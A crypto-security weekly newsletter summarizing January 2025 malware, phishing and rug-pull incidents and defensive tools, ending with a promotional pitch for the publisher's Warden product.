Scammers, Hacks, & Phishing as We Deliver Insights to Keep You Safe — “Crypto Security Truths”: Issue 29
Weekly Review of Top Cybersecurity Incidents, Topics, Tools and Issues in Web3, Crypto, and Blockchain Ecosystems
We have been capturing as much as we run across every week to find you clear examples of what not to do in the Cryptoverse in terms of risk, safety and security. We have captured a long list of topics this week in the following headings: Malware, Phishing, Scammers, & Tools so buckle up and learn how to protect yourself better in Crypto.
Our top thought leaders capture their own perspective for each category as an Analyst Notes.
10 Jan 25–17 Jan 25
Don’t forget you can vote up to 50-times a day for your favorite articles. We accept more than 1-vote.
Introduction
This week’s analysis dives deep into the ever-evolving tactics of crypto attackers, from sophisticated malware distributed via fake verification bots to phishing scams that exploit user trust and haste. We’ll explore incidents like a $57K loss from a contaminated CEX address and a $426K permit signature scam, alongside new warnings about honeypot tokens and wallet-centralized projects like $ROSSCOIN and $NEIRO. Adding to the intrigue, we spotlight cutting-edge security tools like MistTrack’s blockchain analysis suite and GoPlus Security’s plugin, which aim to counteract these growing threats. As scams grow more insidious and tools evolve to meet them, what can we learn to stay ahead of bad actors?
Malware
Increased Malware Targeting Wallet-Connect Users
Scammers are evolving beyond basic wallet-connect scams, using sophisticated malware distributed through fake verification bots, trading groups, and airdrop communities. These tactics allow attackers to access passwords, scan for wallet files, and steal sensitive data. Users are advised to avoid running unverified commands, installing unknown software, and falling for urgent group invites.
Fake Cloudflare Verification Pages Deploy Malware
Attackers are deploying malware through fake Cloudflare verification pages, tricking victims into executing malicious clipboard commands. These attacks involve clipboard injection, PowerShell commands, and persistence via Windows startup. Users should avoid running commands from unknown sources, verify website authenticity, and be cautious of clipboard-based verification methods.
Analyst Takeaway: Malware attacks are increasingly targeting crypto users through clever social engineering and technical manipulation, such as fake verification bots and Cloudflare pages. The evolving threat landscape highlights attackers’ ability to exploit human error and weak system defenses. Users must adopt zero-trust practices, validate software sources, and stay informed on emerging attack techniques to outmaneuver these threats.
Phishing
Copying Wrong CEX Address — User loses $57K
A victim suffered a $57,680 loss by inadvertently copying a contaminated CEX deposit address from a compromised transfer history. This highlights the critical importance of double-checking addresses during cryptocurrency transactions, as even a small oversight can result in significant financial losses.
Another “permit” signature captured WETH — user lost $135K
A victim lost $135,068 worth of Wrapped Ethereum (WETH) after falling prey to a phishing attack that exploited a malicious “permit” signature. This technique relies on tricking the user into signing a fraudulent transaction, granting the attacker access to their funds without needing private keys. By leveraging the deceptive nature of phishing and exploiting the victim’s trust, the attacker drained the funds seamlessly. The incident underscores the importance of carefully reviewing any signature request, verifying its legitimacy, and understanding the implications of the transaction before proceeding.
Another “permit” signature capture — user lost $426K
A victim lost $426,106 worth of USUALUSDC+ after unknowingly signing a phishing “permit” signature. This scam demonstrates how attackers exploit permissions to drain funds, emphasizing the need for users to verify transaction details and avoid signing unfamiliar requests.
Fake Telegram Scams and Malicious Bots Target Crypto Users
A new wave of sophisticated scams targets crypto enthusiasts via fake Telegram groups impersonating popular influencers. These scams employ malicious bots and deceptive Cloudflare verification prompts that trick users into executing PowerShell commands through clipboard injections. The attack downloads malware disguised as “OneDrive.exe,” establishes persistence via Windows startup, and tampers with system settings. Red flags include unauthorized admin access requests and suspicious verification prompts. Users are advised to avoid running commands from untrusted sources, verify website authenticity, and remain cautious of clipboard-based attacks.
Phishing Attack Compromises @dawninternet’s Twitter Account
The Twitter account of @dawninternet was compromised and used to post phishing tweets, aiming to deceive followers into falling victim to scams. This incident underscores the importance of account security measures, such as enabling two-factor authentication and monitoring for suspicious activity, to prevent unauthorized access and potential losses.
Phishing Transaction Leads to $263K Loss in $VIRTUAL
A phishing scam resulted in a victim losing $263,255 worth of $VIRTUAL tokens after unknowingly signing a fraudulent transaction. This highlights the critical need for users to carefully scrutinize transaction details and avoid interacting with unknown or suspicious links to protect their digital assets.
Telegram Credential Scams via Phone Login Exploits
A new phishing method involves attackers requesting users’ phone numbers and Telegram login codes instead of injecting malicious code. Once they gain access to Telegram credentials, they can impersonate victims, manipulate contacts, and potentially orchestrate further scams. Users should exercise caution and avoid sharing sensitive login information, especially with unverified sources.
Analyst Takeaway: Phishing attacks remain the most effective vector for draining crypto wallets and stealing credentials. From malicious permit signatures to deceptive Telegram bots, attackers exploit trust and urgency to manipulate victims. The staggering financial losses underscore a critical need for better user education, rigorous address verification, and an unwavering skepticism toward unsolicited requests. Remember: haste in crypto is the gateway to compromise.
Scammers
Honeypot Tokens with Backdoors Exploit Transfers
Attackers have deployed malicious honeypot tokens, such as $NUDEAI and $MEGA, with backdoors hidden in smart contracts. These backdoors, now moved from SafeMath.mod() to MerkleProof.verifyCalldata(), allow unauthorized transfers of user assets. This underscores the importance of auditing contracts and avoiding interactions with unverified tokens to prevent financial losses.
Warden Highlights Bankless Email Scam
Warden raised awareness about a phishing scam targeting Bankless users with fake claimable rewards. By alerting the community, Warden reinforced the need for vigilance against email scams in the crypto space and emphasized the importance of proactive security measures to stay protected.
$ROSSCOIN Concerns
Crypto Rug Muncher warns against $ROSSCOIN, citing evidence from the Devsnightmare bot that insiders control over 15% of the token supply. Additionally, suspicious trading activity reveals that top traders made minimal purchases while cashing out large amounts, raising significant red flags. The token’s promotion by @blknoiz06 adds to skepticism, with the warning urging investors to proceed cautiously.
$TRUMP Scam Alert
$TRUMP, flagged as a high-risk token by Crypto Rug Muncher, is linked to the Solana Syndicate, notorious for orchestrating rug pulls. GMGN’s analysis reveals insider wallets dominating the top 100 holders, setting the stage for an inevitable rug pull. The warning advises avoiding the project to safeguard assets and steer clear of the syndicate’s other ventures.
$LUMI Risk Alert
$LUMI, labeled a bundled scam by Crypto Rug Muncher, is flagged for suspicious wallet activity. Fresh wallets exclusively holding $LUMI, purchased via Raydium, suggest the project is orchestrated for a rug pull. Investors are advised to avoid the token to protect their crypto assets.
$TRMXBT and Solana Syndicate Schemes
$TRMXBT is identified as another bundled scam tied to the Solana Syndicate. Known for orchestrating hundreds of rug pulls, the syndicate’s tactics involve using fake accounts to shill projects. The warning urges vigilance and avoidance of their promoted tokens to avoid losses.
$WULFY Scam Exposure
Crypto Rug Muncher highlights $WULFY as a project run by serial scammers, with the token dumping rapidly. Investors who ignored the warnings now face significant losses, showcasing the importance of identifying scams early.
$BLOCK Risk Warning
$BLOCK is deemed a high-risk bundled scam, with developers retaining nearly 55% of the token supply. Serial promoter Crypto Rover is pushing the token, raising additional concerns about a likely rug pull. The warning encourages thorough research before considering any involvement.
$CatTax Bundled Scam
Pay Cat Tax ($CatTax) is exposed as a bundled scam, with its developer distributing the token supply across hundreds of controlled wallets. This setup strongly indicates an impending rug pull, and investors are advised to avoid the project entirely.
$BALL Scam Alert
Crypto Ball ($BALL) is another fraudulent project linked to the Solana Syndicate. Like their previous scams, it is expected to end in a rug pull. Investors are urged to avoid the project to protect their assets from loss.
$NEIRO Wallet Centralization
Crypto Rug Muncher highlights concerning wallet connections in Binance-listed $NEIRO, using Bubblemaps v2 with Magic Nodes. After excluding exchanges from the map, the token appears highly centralized, contradicting its “community” branding.
$VIRTUAL on Base — Concerning Wallet Activity
Analyzing $VIRTUAL on Base with Bubblemaps v2 and Magic Nodes enabled reveals alarming wallet activity. The interconnectedness of wallets suggests potential risks, painting a grim picture of the token’s structure.
$MOG Wallet Web Raises Alarms
Crypto Rug Muncher expresses concerns about $MOG, where Bubblemaps 2.0 with Magic Nodes reveals an intricate web of interconnected wallets. While questioning if a Uniswap Router wallet might explain these links, the findings cast doubt on the project’s community-controlled claims, prompting calls for further analysis.
$PWH — Another Solana Syndicate Scam
Penguwifhat ($PWH) is flagged as a bundled scam orchestrated by the Solana Syndicate. Following their established pattern, this project is expected to end in a rug pull, leading to financial losses for investors. The warning advises avoiding this and similar scams.
Analyst Takeaway: The crypto landscape continues to be plagued by highly orchestrated scams, with bad actors leveraging insider tactics, wallet centralization, and deceptive promotions to rug unsuspecting investors. Projects linked to the Solana Syndicate and other fraudulent groups reinforce the importance of using tools like contract auditors and on-chain analysis to uncover hidden dangers. Blind trust in influencers or “hyped” tokens is a recipe for financial disaster.
Tools
Security Plugins for Crypto Protection
As crypto scams surge, tools like GoPlus Security’s plugin are becoming essential for safeguarding users. Backed by Binance, this plugin offers phishing site detection, risky transaction alerts, and more. Excitement is growing for their upcoming release of a security-enhanced plugin designed to empower ElizaOS agents with cutting-edge intelligence, signaling a new era of AI-driven crypto security solutions.
Revoke Multiple Approvals Made Easier
Revoke.cash introduced a long-awaited feature allowing users to revoke multiple approvals in a single transaction. This innovation is now possible thanks to advancements in account abstraction and smart contract wallets like Ambire Wallet, Safe, and AbstractChain. By simplifying approval management, this update represents a significant leap in usability and security for DeFi users.
Telegram Fake Safeguard Bot Detection
ScamSniffer has introduced a new Telegram-specific feature in its anti-scam extension to detect and alert users about suspicious “Safeguard” bots in real-time. This proactive measure aims to combat the rising threat of fake bots on Telegram targeting unsuspecting crypto users.
MistTrack’s Advanced Blockchain Analysis Tools
MistTrack offers a comprehensive suite of blockchain analysis tools, including address activity monitoring, OpenAPI integration, and AML screening for real-time “Know Your Trade” analysis. Users can privately track wallet activity, evaluate transaction histories, and utilize the platform’s risk assessment features. With flexible pricing plans and a free trial for professional users, MistTrack aims to simplify blockchain analysis for individuals, developers, and enterprises alike.
Bubblemaps Tool Reliability Issues
Crypto Rug Muncher criticizes the Bubblemaps V2 tool for its continued inaccuracies in mapping wallet connections. The tool either overstates or fails to detect wallet associations, particularly for newer projects. While acknowledging the tool’s potential, the criticism calls for improvements in accuracy and consistency to enhance its usability in analyzing crypto data effectively.
Analyst Takeaway: The rise in crypto scams has accelerated the need for security tools that empower users with proactive defense mechanisms. From GoPlus Security’s phishing detection to MistTrack’s advanced blockchain monitoring, these tools offer a lifeline for navigating a hostile crypto environment. However, gaps in reliability, such as Bubblemaps’ mapping issues, remind us that even the best tools require scrutiny and continuous improvement. Leveraging these innovations smartly can be the difference between safeguarding assets and becoming a victim.
Conclusion
This week’s key takeaway is clear: vigilance and education are the strongest defenses against the increasingly creative tactics of crypto attackers. Whether it’s malware exploiting social engineering, phishing scams manipulating urgency, or insider-controlled token schemes orchestrating rug pulls, the onus is on users to slow down, verify, and utilize emerging security tools. Analysts emphasize the need for zero-trust practices, thorough research, and leveraging tools like contract auditors and scam-detection plugins to expose hidden risks. Staying one step ahead of scammers isn’t just about tools — it’s about fostering a culture of skepticism and awareness in the crypto space.
Thanks for getting this far in our article. Don’t forget that you can vote up to 50-times a day for your favorite articles on Medium. We accept more than 1-vote, as it helps us spread the Cybersecurity insights into Crypto. The more people that see this information, the more people we can help. We should share information about criminals and scammers to help protect each other, just like we pick up stray trash and put it in the trash can.
Further Resources about Cyber Strategy Institute:
If interested in other analysis, checkout our other Crypto Security Medium articles, our Indpeth Analysis Articles and for more of a daily understanding of the Cryptoverse follow our Twitter account. Relying on a dying Cybersecurity model is not a foundation for success; that is what Warden changes for the good!
Warden
It is designed leveraging a Zero Trust model, stopping all known bad and unknown malicious threats. This starts by defending at the kernel level, so that any software does not know it’s been placed into a sandbox. We call this the “Inception Protection” model, which will not allow any program to impact your systems. No other system can do this on the market today. Protect your digital life, your families or your organization today with Warden!
If you want a 50% Discount on your purchase, then sign up for our newsletter, and we will send you the code for your support. Just reply to your first email saying you would like a discount.
Cyber Strategy Institute
Medium: https://cyberstrategy1.medium.com/
Twitter: https://twitter.com/CyberStrategy1
X: https://x.com/Warden_Secure
Website: https://cyberstrategyinstitute.com
Protect Yourself, Family or Business Today with Warden!
https://cyberstrategyinstitute.com/personal-protection-warden
